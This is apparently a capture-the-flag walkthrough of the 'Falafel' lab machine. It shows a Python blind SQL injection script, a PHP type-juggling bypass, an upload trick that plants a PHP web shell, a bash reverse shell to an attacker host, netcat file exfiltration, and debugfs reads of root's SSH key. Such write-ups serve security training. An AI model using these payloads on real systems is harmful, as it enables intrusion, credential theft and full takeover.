Falafel

Enumeration

As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.

The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:

nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.73 -oN allPorts

-sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.
-p- scanning the entire port range, from 1 to 65535.
-T5 insane mode, it is the fastest mode of the nmap time template.
-Pn assume the host is online.
-n scan without reverse DNS resolution.
-oN save the scan result into a file, in this case the allports file.

# Nmap 7.93 scan initiated Tue Nov 15 18:23:28 2022 as: nmap -sS --min-rate 5000 -n -Pn -p- -oN allPorts 10.10.10.73
Nmap scan report for 10.10.10.73
Host is up (0.065s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

# Nmap done at Tue Nov 15 18:23:42 2022 -- 1 IP address (1 host up) scanned in 13.47 seconds

Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:

nmap -sC -sV -p22,80 10.10.10.73 -oN targeted

-sC performs the scan using the default set of scripts.
-sV enables version detection.
-oN save the scan result into file, in this case the targeted file.

# Nmap 7.93 scan initiated Tue Nov 15 18:23:59 2022 as: nmap -sCV -p22,80 -oN targeted 10.10.10.73
Nmap scan report for 10.10.10.73
Host is up (0.037s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 36c00a2643f8cea82c0d192110a6a8e7 (RSA)
|   256 cb20fdffa880f2a24b2bbbe17698d0fb (ECDSA)
|_  256 c4792bb6a9b7174c0740f3e57c1ae9dd (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_/*.txt
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Falafel Lovers
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Nov 15 18:24:37 2022 -- 1 IP address (1 host up) scanned in 38.60 seconds

There is just a welcome message in the website.

The robots.txt file contains the disallow entry /*.txt.

Let's try to list any subdirectories or any .txt and .php files hidden in the website.

gobuster dir -u http://10.10.10.73/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 200 --no-error -x txt,php

dir enumerates directories or files.
-u the target URL.
-w path to the wordlist.
-t number of current threads, in this case 200 threads.

===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.73/
[+] Method:                  GET
[+] Threads:                 200
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Extensions:              php,txt
[+] Timeout:                 10s
===============================================================
2022/11/16 22:53:21 Starting gobuster in directory enumeration mode
===============================================================
/profile.php          (Status: 302) [Size: 9787] [--> login.php]
/images               (Status: 301) [Size: 311] [--> http://10.10.10.73/images/]
/uploads              (Status: 301) [Size: 312] [--> http://10.10.10.73/uploads/]
/header.php           (Status: 200) [Size: 288]
/assets               (Status: 301) [Size: 311] [--> http://10.10.10.73/assets/]
/footer.php           (Status: 200) [Size: 0]
/upload.php           (Status: 302) [Size: 0] [--> profile.php]
/css                  (Status: 301) [Size: 308] [--> http://10.10.10.73/css/]
/style.php            (Status: 200) [Size: 6174]
/js                   (Status: 301) [Size: 307] [--> http://10.10.10.73/js/]
/logout.php           (Status: 302) [Size: 0] [--> login.php]
/robots.txt           (Status: 200) [Size: 30]
/cyberlaw.txt         (Status: 200) [Size: 804]
/connection.php       (Status: 200) [Size: 0]
/.php                 (Status: 403) [Size: 290]
===============================================================
2022/11/16 22:55:28 Finished
===============================================================

The /cyberlaw.txt file is says that there is a way to log in to the site as the admin user. Also, get into the server using the image upload feature.

Exploitation

If we try to log in as the admin user with random credentials, we'll get the error Wrong identification : admin.

But, if we try to log in as some random user, we will get the error Try again...

If we try to log in with an SQL injection payload, we'll get the error Wrong identification : admin. Which means that the query is valid.

' or 1=1-- -

We can't bypass the login page, but we can run SQL queries, and as if the error is Wrong identification : admin. the query is true, and if the error is Try again.. the query is false, we will have to exploit a Boolean SQL Injection. if we start enumerating the database with the UNION statement as usual, we'll get the error Hacking Attempt Detected!.

' union select 1-- -

But there are other ways of enumerating a database. The following query will check if the first letter of admin is an a. As the comparison is true we should get the error Wrong identification : admin.

admin' and substring(username,1,1)='a'-- -

I made the following script in python which will guess all the characters of the password hash stored in the database following the previous logic.

#/usr/bin/env python
from pwn import *
import requests

def def_handler(sig, frame):
    print("[!] Quiting...")
    sys.exit(1)
    
#Ctrl+C
signal.signal(signal.SIGINT, def_handler)

# Variables
url = "http://10.10.10.73/login.php"


def makeRequest():
    characters = '0123456789abcdefghijklmnopqrstuvwxyz'
    username = "admin"
    password = ""
    counter = 1

    p1 = log.progress("Brute Force")
    p1.status("Brute forcing...")
    time.sleep(1)
    
    p2 = log.progress("Password hash: ")

    while True:
                    
        for char in characters:

            p1.status("Trying with the %c character" % char)

            post_data = {
                "username": username + f"' and substring(password,{counter},1)='{char}' -- -",
                "password": "test",

            }

            r = requests.post(url, post_data, allow_redirects=False)

            if "identification" in r.text:
                password += char
                counter += 1
                p2.status(password)
                break


if __name__ == '__main__':
    makeRequest()

If we run the script, we'll see that the password hash for the admin user is 0e462096931906507119562988736854.

python script.py

[....\...] Brute Force: Trying with the 2 character
[d] Password hash: : 0e462096931906507119562988736854

But we can't break the hash and it is not available in any rainbow table.

But, if you remember in the /cyberlaw.txt there was another user called chris. Let's try to get his password hash. Make sure to change the username to chris.

python script.py

[O] Brute Force: Trying with the 0 character
[o] Password hash: : d4ee02a22fc872e36d9e3751ba72ddc8

We got a new hash, and this time it is available in the rainbow tables.

Let's log in as the chris user.

The welcome message is putting a lot of emphasis on juggling. Maybe we have to exploit a Type Juggling attack. If the login page is vulnerable to this vulnerability, the page will compare the hash of the admin user with the md5 hash of our password input using the == comparison. As the admin password hash start with 0e, which means and exponential of 0, which is equal to 0.

php --interactive
php > if ("0e462096931906507119562988736854" == 0) { echo "equal"; } else { echo "not equal"; }

equal

So if we log in with a password, whose hash start with 0e and the rest of the hash are numbers, the result of the exponential will also be 0 as the hash of the admin user, and we'll be able to log in a admin.

Now we are logged in as admin.

Now, there might be a way to get access to the server with this upload feature. Let's do a test. First, set a simple HTTP server with python.

python -m http.server 80

Now, create a file called test.png.

touch test.png

Now, click on Upload, then intercept the request with BurpSuite, and send it to the Repeater. Then, send a request with the following value as the url parameter.

As you can see, the file got downloaded. The server is storing the file inside a random directory. We could try to upload .php files.

touch test.php

But we are not allowed to do that. On linux, the filenames can't be longer than 255 bytes. So what happens if we try to upload a file whose name is 255 bytes long. Let's check it out. First, let's create a patter of 251 bytes, as we do in buffer overflows.

msf-pattern_create

Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai

Now, create a file called like the pattern with the .png extension, so it has 255 bytes, and we are able to upload it.

touch Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai.png

Now, upload it to the website.

As we can see, we were able to upload the file, but the filename got shortened. There must be some kind of job shortening the filenames in case they are too long.

Something we can do is check what is the exact offset of bytes that we can upload, and then upload a file with offset-4 characters, and then the .php.png extension, so we can upload the file. This way the shorten job will cut of the .png part, and we'll be able to upload a .php file with some malicious code. First, calculate the offset. As you can see, the last 4 characters of the shortened file are Ah7A.

echo -n "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah" | wc -c

Now, create a new patter with 236-4 characters.

msf-pattern_create -l 232

Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6A

Create a file with that name and the .php.png extension. Write some malicious code on the file.

nano Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6A.php.png

<?php echo system($_GET['cmd']); ?>

If we upload the file, we'll see that the server cut off the .png part, and it stored a .php file in the /uploads/1117-2156_6e68af9e0ef8c74a directory.

Now, if we access the PHP file, we'll be able to run commands using the cmd parameter.

curl "http://10.10.10.73/uploads/1117-2156_6e68af9e0ef8c74a/Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6A.php?cmd=whoami"

www-data

Let's get a reverse shell. First, set a netcat listener on port 4444 with netcat.

nc -lvnp 4444

-l listen mode.
-v verbose mode.
-n numeric-only IP, no DNS resolution.
-p specify the port to listen on.

Now, send the reverse shell.

curl "http://10.10.10.73/uploads/1117-2156_6e68af9e0ef8c74a/Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6A.php?cmd=bash%20-c%20'bash%20-i%20>%26%20/dev/tcp/10.10.14.14/4444%200>%261'"

Listening on 0.0.0.0 4444
Connection received on 10.10.10.73 50354
bash: cannot set terminal process group (1303): Inappropriate ioctl for device
bash: no job control in this shell
www-data@falafel:/var/www/html/uploads/1117-2156_6e68af9e0ef8c74a$ whoami
whoami
www-data

Privilege Escalation

First, let's set an interactive TTY shell.

script /dev/null -c /bin/bash

Then I press Ctrl+Z and execute the following command on my local machine:

stty raw -echo; fg
reset
Terminal type? xterm

Next, I export a few variables:

export TERM=xterm
export SHELL=bash

Finally, I run the following command in our local machine:

stty size

51 236

And set the proper dimensions in the victim machine:

stty rows 51 columns 236

Let's check the system users.

grep sh /etc/passwd

root:x:0:0:root:/root:/bin/bash
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
postgres:x:111:116:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
yossi:x:1000:1000:Yossi,,,:/home/yossi:/bin/bash
moshe:x:1001:1001::/home/moshe:

If we check the /var/www/html directory, we'll see a file called connection.php.

ls -la /var/www/html

total 92
drwxr-x---  7 root www-data 4096 Sep 13 18:51 .
drwxr-xr-x  3 root root     4096 Sep 13 18:51 ..
-rwxr-xr--  1 root www-data   41 Oct 29  2017 .htaccess
drwxr-xr--  2 root www-data 4096 Oct 29  2017 assets
-rwxr-xr--  1 root www-data  423 Oct 29  2017 authorized.php
-rwxr-xr--  1 root www-data  377 Nov 28  2017 connection.php
drwxr-xr--  2 root www-data 4096 Nov 28  2017 css
-rwxr-xr--  1 root www-data  804 Nov 27  2017 cyberlaw.txt
-rwxr-xr--  1 root www-data    0 Nov 27  2017 footer.php
-rwxr-xr--  1 root www-data 1140 Nov 27  2017 header.php
-rwxr-xr--  1 root www-data 7335 Aug 13  2015 icon.png
drwxr-xr--  2 root www-data 4096 Nov 27  2017 images
-rwxr-xr--  1 root www-data  818 Nov 28  2017 index.php
drwxr-xr--  2 root www-data 4096 Nov 28  2017 js
-rwxr-xr--  1 root www-data  752 Oct 29  2017 login.php
-rwxr-xr--  1 root www-data 1800 Nov 28  2017 login_logic.php
-rwxr-xr--  1 root www-data  107 Oct 29  2017 logout.php
-rwxr-xr--  1 root www-data 1913 Nov 28  2017 profile.php
-rwxr-xr--  1 root www-data   30 Nov 28  2017 robots.txt
-rwxr-xr--  1 root www-data 6174 Nov 28  2017 style.php
-rwxr-xr--  1 root www-data 3647 Nov 28  2017 upload.php
drwxrwxr-- 10 root www-data 4096 Nov 17 21:56 uploads

That file contains credentials for the MySQL database.

cat /var/www/html/connection.php

<?php
   define('DB_SERVER', 'localhost:3306');
   define('DB_USERNAME', 'moshe');
   define('DB_PASSWORD', 'falafelIsReallyTasty');
   define('DB_DATABASE', 'falafel');
   $db = mysqli_connect(DB_SERVER,DB_USERNAME,DB_PASSWORD,DB_DATABASE);
   // Check connection
   if (mysqli_connect_errno())
   {
      echo "Failed to connect to MySQL: " . mysqli_connect_error();
   }
?>

And it looks like that password is valid for the moshe user. Then, we can grab the user flag.

su moshe

Password: falafelIsReallyTasty
setterm: terminal xterm does not support --blank
moshe@falafel:/var/www/html/uploads/1117-2156_6e68af9e0ef8c74a$ whoami
moshe
moshe@falafel:/var/www/html/uploads/1117-2156_6e68af9e0ef8c74a$ cd
moshe@falafel:~$ cat user.txt 
1a203d14a3460277a12d5b33b0c734d5

By checking what groups is moshe a member, we'll see he is member of the video group.

id

uid=1001(moshe) gid=1001(moshe) groups=1001(moshe),4(adm),8(mail),9(news),22(voice),25(floppy),29(audio),44(video),60(games)

Someone that is a member of the video group could be able to take screenshots. First, we'll need to find the proper virtual device.

find / -group video 2>/dev/null

/dev/fb0
/dev/dri/card0
/dev/dri/renderD128
/dev/dri/controlD64

Now, copy the /dev/fb0 file into the /tmp directory.

cp /dev/fb0 /tmp/

Let's transfer that file to our local machine. Set a netcat listener on port 5555, pointing to fb0.raw.

nc -lvnp 5555 > fb0.raw

Then, on the falafel machine, send the file with netcat.

nc 10.10.14.14 5555 < fb0

Now, we need to know the proper dimensions of the screen of the victim machine.

echo "Width:"; cat /sys/class/graphics/fb0/virtual_size | cut -d, -f1; echo " Heigth:"; cat /sys/class/graphics/fb0/virtual_size | cut -d, -f2

Width: 
1176
Heigth: 
885

On our local machine, create the video.pl script with the following code.

nano video.pl

#!/usr/bin/perl -w

$w = shift || 240;
$h = shift || 320;
$pixels = $w * $h;

open OUT, "|pnmtopng" or die "Can't pipe pnmtopng: $!\n";

printf OUT "P6%d %d\n255\n", $w, $h;

while ((read STDIN, $raw, 2) and $pixels--) {
   $short = unpack('S', $raw);
   print OUT pack("C3",
      ($short & 0xf800) >> 8,
      ($short & 0x7e0) >> 3,
      ($short & 0x1f) << 3);
}

close OUT;

Finally, let's run the script with the width and heigth as parameters.

perl video.pl 1176 885 < fb0.raw > fb0.png

If we take a look at the fb0.png screenshot, we'll see that the user yossi is changing his password to MoshePlzStopHackingMe!.

Let's become the yossi user.

su yossi

Password: MoshePlzStopHackingMe!
yossi@falafel:/tmp$ whoami
yossi

If we check the yossi groups, we'll see that he is member of the disk group.

id

uid=1000(yossi) gid=1000(yossi) groups=1000(yossi),4(adm),6(disk),24(cdrom),30(dip),46(plugdev),117(lpadmin),118(sambashare)

As we are in the disk group, we can read all the hard drives devices.

fdisk -l

Disk /dev/sda: 4 GiB, 4294967296 bytes, 8388608 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0x2aa34854

Device     Boot   Start     End Sectors  Size Id Type
/dev/sda1          2048 7337983 7335936  3.5G 83 Linux
/dev/sda2       7337984 8388607 1050624  513M  5 Extended
/dev/sda5       7340032 8388607 1048576  512M 82 Linux swap / Solaris

It looks like the filesystem is stored in /dev/sda1. Let's take a look at it.

debugfs /dev/sda1
debugfs: ls

 2  (12) .    2  (12) ..    11  (20) lost+found    131073  (12) etc   
 31  (16) media    131075  (12) bin    426  (12) boot    2091  (12) dev   
 12  (12) home    13  (12) lib    2451  (16) lib64    2453  (12) mnt   
 2454  (12) opt    2455  (12) proc    2456  (12) root    2459  (12) run   
 2472  (12) sbin    2589  (12) srv    2590  (12) sys    2591  (12) tmp   
 2592  (12) usr    131762  (12) var    24441  (20) initrd.img   
 24442  (40) vmlinuz    145141  (3756) snap

As we are able to use the entire file system, we could grab the id_rsa file of the root user.

debugfs: cat /root/.ssh/id_rsa

Copy the key to our local machine, give the file a 600 permission, and log in as root to the machine. Then, all we have to do is reap the harvest and take the root flag.

nano id_rsa
chmod 600
ssh -i id_rsa root@10.10.10.73

Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.4.0-112-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

0 packages can be updated.
0 updates are security updates.


Last login: Tue May  1 20:14:09 2018 from 10.10.14.4
root@falafel:~# whoami
root
root@falafel:~# cat root.txt 
8acbf5e11783a28dd4d136164916c7cb

Last updated 2 years ago

Was this helpful?